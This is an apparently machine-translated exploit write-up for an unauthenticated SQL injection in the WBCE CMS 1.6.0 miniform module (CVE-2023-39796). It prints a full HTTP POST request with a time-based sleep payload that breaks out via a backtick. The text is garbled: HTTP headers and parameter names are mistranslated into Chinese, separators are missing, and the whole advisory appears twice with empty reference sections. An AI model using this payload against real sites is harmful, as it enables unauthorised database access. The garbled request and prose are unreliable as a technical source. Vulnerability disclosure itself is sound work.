#利用标题: |未经验证的SQL注入WBCE 1.6.0
#日期: 15.11.2023
#利用作者:年轻的poppe
#供应商homepage: https://github.com/wbce/wbce_cms
#软件link: https://github.com/wbce/wbce_cms/archive/refs/refs/tags/1.6.0.zip
#版本: 1.6.0
#在: Kali Linux上测试
#CVE : CVE-2023-39796
在file/modules/miniform/ajax_delete_message.php中没有
认证检查。在线| 40 |在此文件中,有一个|删除|
易受伤害的查询,攻击者可以使用查询从查询中跳下来
刻度标志- ``````。
函数| addslashes()|
(https://www.php.net/manual/en/function.addslashes.php)仅逃脱
这些字符而不是tick sign:
*单Quote(')
如果未经验证的攻击者发送此请求:
````````
post/modules/miniform/ajax_delete_message.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; OpenBSD I386)AppleWebkit/537.36(Khtml,
像壁虎一样)Chrome/36.0.1985.125 Safari/537.36
连接:关闭
内容长度: 162
ACCEPT: /
接受语言: en
content-type:应用程序/x-www-form-urlenceded
Accept-incoding: Gzip,放气
操作=deletedb_record_table=miniform_data`+其中+1%3d1+and+(select+1+来自+(select(sleep(6)))a)a) - +iRecordid=1db_column=1db_column=message_idmodule=ploce=perive=delete=delete_record
````````
6s后收到响应。
参考链接:
#日期: 15.11.2023
#利用作者:年轻的poppe
#供应商homepage: https://github.com/wbce/wbce_cms
#软件link: https://github.com/wbce/wbce_cms/archive/refs/refs/tags/1.6.0.zip
#版本: 1.6.0
#在: Kali Linux上测试
#CVE : CVE-2023-39796
- Miniform *模块中有一个SQL注入漏洞
- WBCE * CMS中安装的默认模块。这是一个未经身心的
在file/modules/miniform/ajax_delete_message.php中没有
认证检查。在线| 40 |在此文件中,有一个|删除|
易受伤害的查询,攻击者可以使用查询从查询中跳下来
刻度标志- ``````。
函数| addslashes()|
(https://www.php.net/manual/en/function.addslashes.php)仅逃脱
这些字符而不是tick sign:
*单Quote(')
- double Quote(')
- BackSlash()
- nul(nul字节
如果未经验证的攻击者发送此请求:
````````
post/modules/miniform/ajax_delete_message.php http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; OpenBSD I386)AppleWebkit/537.36(Khtml,
像壁虎一样)Chrome/36.0.1985.125 Safari/537.36
连接:关闭
内容长度: 162
ACCEPT: /
接受语言: en
content-type:应用程序/x-www-form-urlenceded
Accept-incoding: Gzip,放气
操作=deletedb_record_table=miniform_data`+其中+1%3d1+and+(select+1+来自+(select(sleep(6)))a)a) - +iRecordid=1db_column=1db_column=message_idmodule=ploce=perive=delete=delete_record
````````
6s后收到响应。
参考链接: